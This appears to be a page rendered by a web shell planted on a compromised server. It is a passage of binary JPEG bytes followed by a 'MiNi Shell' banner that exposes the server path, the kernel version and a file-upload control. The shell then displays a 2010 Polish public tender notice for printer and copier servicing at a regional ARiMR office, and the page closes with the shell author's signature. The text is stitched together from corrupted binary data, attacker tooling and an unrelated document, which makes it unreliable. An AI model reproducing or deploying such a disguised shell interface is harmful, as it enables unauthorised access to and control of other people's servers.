JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101012/283177-N-2010.html

<p class="kh_header"><b>Łomża: Obsługa serwisowa drukarek, kopiarek, faksów oraz urządzenia kopiującego RISO eksploatowanych w Podlaskim Oddziale Regionalnym ARiMR oraz podległych jednostkach na terenie województwa podlaskiego obejmującą konserwacje, naprawy i wymiany części/podzespołów.</b><br>
<b>Numer ogłoszenia: 283177 - 2010; data zamieszczenia: 12.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podlaski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa , ul. Nowa 2, 18-400 Łomża, woj. podlaskie, tel. 086 2156314, faks 086 2164513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa serwisowa drukarek, kopiarek, faksów oraz urządzenia kopiującego RISO eksploatowanych w Podlaskim Oddziale Regionalnym ARiMR oraz podległych jednostkach na terenie województwa podlaskiego obejmującą konserwacje, naprawy i wymiany części/podzespołów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie obsługi serwisowej drukarek HP, Lexmark, Zebra ZNET, kopiarek Canon, Lexmark, faksów Canon, HP oraz urządzenia kopiującego RISO eksploatowanych w Podlaskim Oddziale Regionalnym ARiMR oraz podległych jednostkach na terenie województwa podlaskiego obejmująca konserwacje, naprawy i wymiany części/podzespołów, zwanych dalej sprzętem. Wykaz jednostek terenowych Podlaskiego Oddziału Regionalnego ARiMR ze wskazaniem ilości i modeli sprzętu zawiera Załącznik nr 6 do Specyfikacji.
Zakres obsługi obejmuje:
a) konserwacje wykonywane podczas naprawy sprzętu i wymiany części/podzespołów. Zakres konserwacji sprzętu obejmuje następujące czynności:
- czyszczenie i odkurzanie wnętrza,
- czyszczenie i mycie układu optyki,
- czyszczenie elementów pobierania i transportu papieru (rolki, pasy transportu),
- czyszczenie układu grzejnego i drukującego,
- kontrola stanu technicznego podzespołów;
b) naprawy sprzętu i wymiany części/podzespołów zużywających się lub uszkodzonych, wskazanych w Załączniku nr 1 do Specyfikacji (Formularz Ofertowy) za cenę jednostkową brutto zaoferowaną przez Wykonawcę w kolumnie G Formularza Ofertowego stanowiącego Załącznik nr 1 do Specyfikacji.
c) prowadzenie dokumentacji obsługi serwisowej sprzętu w poszczególnych jednostkach Podlaskiego Oddziału Regionalnego ARiMR, zgodnie z wzorem stanowiącym Załącznik nr 6 do Umowy (Karta Użytkowania i serwisu kopiarki/drukarki/faxu), określającej datę usługi, zakres usługi, ilość wydrukowanych przez sprzęt kopii, nazwę naprawionego lub wymienionego podzespołu/części ze wskazaniem udzielonego przez Wykonawcę okresu gwarancji określonego ilością wykonanych kopii/wydruków zgodnego z przedstawioną ofertą,
d) wykonanie napraw sprzętu i ewentualna wymiana części (na oryginalne bądź inne - dopuszczone przez producenta sprzętu) odbywać się będzie sukcesywnie, w miarę nadsyłania zgłoszeń awarii przez Zamawiającego. Wzór zgłoszenia awarii stanowi Załącznik nr 3 do Umowy.
2. Warunki wykonania zamówienia:
1) Zamawiający wymaga, aby obsługa serwisowa sprzętu wykonywana była przez osoby przeszkolone w zakresie naprawy sprzętu objętego niniejszym zamówieniem.
2) Wykonawca zobowiązany będzie do wykonywania obsługi serwisowej sprzętu w siedzibach poszczególnych jednostek Podlaskiego Oddziału Regionalnego ARiMR zlokalizowanych na terenie województwa podlaskiego wskazanych w Załączniku nr 6 do Specyfikacji.
3) Wykonawca zobowiązany będzie do wykonywania:
a) konserwacji sprzętu podczas napraw sprzętu/wymiany części/podzespołów,
b) dokonywania napraw sprzętu
- na podstawie pisemnych zgłoszeń awarii Zamawiającego,
- Wykonawca zobowiązany jest ustalić na piśmie (na druku zgłoszenia awarii) termin wykonania naprawy z osobą wskazaną w zgłoszeniu awarii do monitorowania realizacji zgłoszenia awarii 
w danej jednostce organizacyjnej. Termin wykonania naprawy ustalony w ten sposób nie może być dłuższy niż 5 dni roboczych od dnia otrzymania faxem zgłoszenia awarii i musi być potwierdzony podpisem Wykonawcy na druku zgłoszenia awarii stanowiącym Załącznik nr 3 do Umowy, odesłanym faxem do siedziby Zamawiającego (ul. Nowa 2, 18-400 Łomża).
4) Zamawiający wymaga usunięcia zgłoszonej awarii wraz z przeprowadzeniem konserwacji w terminie maksymalnie
a) 5 dni roboczych - w odniesieniu do drukarek, kopiarek i faksów,
b) 21 dni roboczych - w odniesieniu do urządzenia kopiującego RISO,
(od poniedziałku do piątku w godzinach 7:30-15:30) od dnia otrzymania faxem zgłoszenia awarii. 
W przypadku braku możliwości usunięcia zgłoszonej awarii w terminie 5 dni roboczych od dnia otrzymania faxem zgłoszenia awarii, Wykonawca zobowiązany będzie zapewnić równorzędny sprzęt zastępczy o nie gorszych parametrach (drukarki, kopiarki, faksy) do czasu skutecznej naprawy. Zastępczy sprzęt musi być dostarczony na miejsce awarii w terminie 2 dni roboczych od momentu ustalenia, iż naprawa sprzętu będzie trwała dłużej niż 5 dni roboczych nie później jednak niż w terminie 7 dni roboczych od dnia otrzymania faxem zgłoszenia awarii. Koszty zapewnienia i dostarczenia sprzętu zastępczego ponosi Wykonawca. Zapis dotyczący sprzętu zastępczego nie dotyczy urządzenia kopiującego RISO. 
5) W przypadku konieczności użycia do naprawy części/podzespołów nie wskazanych 
w Formularzu Ofertowym (Załącznik nr 1 do Specyfikacji) Wykonawca zobowiązany jest do sporządzenia ekspertyzy określającej przyczyny awarii sprzętu oraz zakres naprawy z uwzględnieniem listy części/podzespołów zamiennych, listy czynności naprawczych, a także nieprzekraczalnego kosztu naprawy z rozbiciem na koszt poszczególnych części/podzespołów. Ewentualne wykonanie naprawy/wymiany części/podzespołów odbędzie się po uzgodnieniu i zaakceptowaniu zasadności, zakresu i kosztu naprawy z osobą upoważnioną ze strony Zamawiającego na blankiecie ekspertyzy stanowiącym Załącznik nr 4 do Umowy.
6) Po zakończeniu naprawy Wykonawca zobowiązany jest przekazać Zamawiającemu protokół realizacji zgłoszenia awarii. Wzór protokołu realizacji zgłoszenia awarii stanowi Załącznik nr 5 do Umowy.
7) Zamawiający zastrzega sobie prawo do zakupu poszczególnych części/podzespołów wymienionych w Formularzu Ofertowym bez konieczności dokonywania wymiany po cenach jednostkowych wymienionych w Formularzu Ofertowym (Załącznik  nr 1 do Specyfikacji) z zastosowaniem 3% upustu. Zlecenie takie będzie realizowane na druku Zapotrzebowania stanowiącym Załącznik nr 7 do Umowy, przy czym Zamawiający wymaga aby części  dostarczane były do siedziby Zamawiającego (ul. Nowa 2, 18-400 Łomża) w terminie:
a) 5 dni roboczych  - w odniesieniu do drukarek, kopiarek i faksów,
b) 21 dni roboczych - w odniesieniu do urządzenia kopiującego RISO,
od daty otrzymania pisma, a zlecenie musi opiewać na kwotę minimum 1.000,00 zł brutto.
8) Zamawiający zastrzega sobie możliwość decydowania, czy do naprawy zostaną użyte pojedyncze części, czy też urządzenie zostanie naprawione poprzez wymianę całych zestawów konserwacyjnych (dotyczy to w szczególności drukarek Lexmark).
9) Zużyte (wymienione na nowe w trakcie naprawy) części/podzespoły pozostają u Zamawiającego.
3. Gwarancja:
Zamawiający wymaga aby Wykonawca:
1) zagwarantował trwałość części/podzespołów po wymianie wskazanych w Formularzu Ofertowym (kolumna F) wyrażoną w liczbie kopii/wydruków, 
2) udzielił minimum 6 miesięcznej gwarancji na zamontowane części/podzespoły inne niż wymienione w Formularzu Ofertowym.
Rozpoczęcie biegu terminu gwarancji będzie liczone od daty podpisania protokołu realizacji zgłoszenia awarii bez zastrzeżeń ze strony Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.32.32.00-7, 50.31.31.00-3, 50.31.32.00-4, 50.31.40.00-9, 50.31.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wymienionego warunku udziału w postępowaniu zostanie dokonana na podstawie analizy przedłożonych przez Wykonawców oświadczeń i dokumentów, wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia w zakresie świadczenia usług w zakresie obsługi serwisowej drukarek, kopiarek i faksów obejmującej konserwacje, naprawy i wymiany części/podzespołów, przy czym Zamawiający wymaga wykazania wiedzy i doświadczenia w zakresie świadczenia co najmniej jednej usługi obsługi serwisowej kopiarek, drukarek i faksów o wartości nie mniejszej niż 56.000,00 zł brutto w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Ocena spełnienia wyżej wymienionego warunku udziału w postępowaniu zostanie dokonana na podstawie analizy przedłożonych przez Wykonawców oświadczeń i dokumentów, wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wymienionego warunku udziału w postępowaniu zostanie dokonana na podstawie analizy przedłożonych przez Wykonawców oświadczeń i dokumentów, wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wymienionego warunku udziału w postępowaniu zostanie dokonana na podstawie analizy przedłożonych przez Wykonawców oświadczeń i dokumentów, wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wymienionego warunku udziału w postępowaniu zostanie dokonana na podstawie analizy przedłożonych przez Wykonawców oświadczeń i dokumentów, wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający nie wymaga przedłożenia innych dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje dokonanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku ustawowej zmiany stawek podatku od towarów i usług (VAT) mającej wpływ na wysokość wynagrodzenia Wykonawcy. Wystąpienie powyższej okoliczności Zamawiający uwzględni - na wniosek Wykonawcy - w formie aneksu do Umowy na podstawie art. 144 ust. 1 Ustawy Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2007 r., nr 223, poz. 1655, z późn. zm.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Podlaski Oddział Regionalny w Łomży, ul. Nowa 2, 18-400 Łomża.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2010 godzina 09:30, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa Podlaski Oddział Regionalny w Łomży, ul. Nowa 2, 18-400 Łomża, pokój 109 lub 112..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com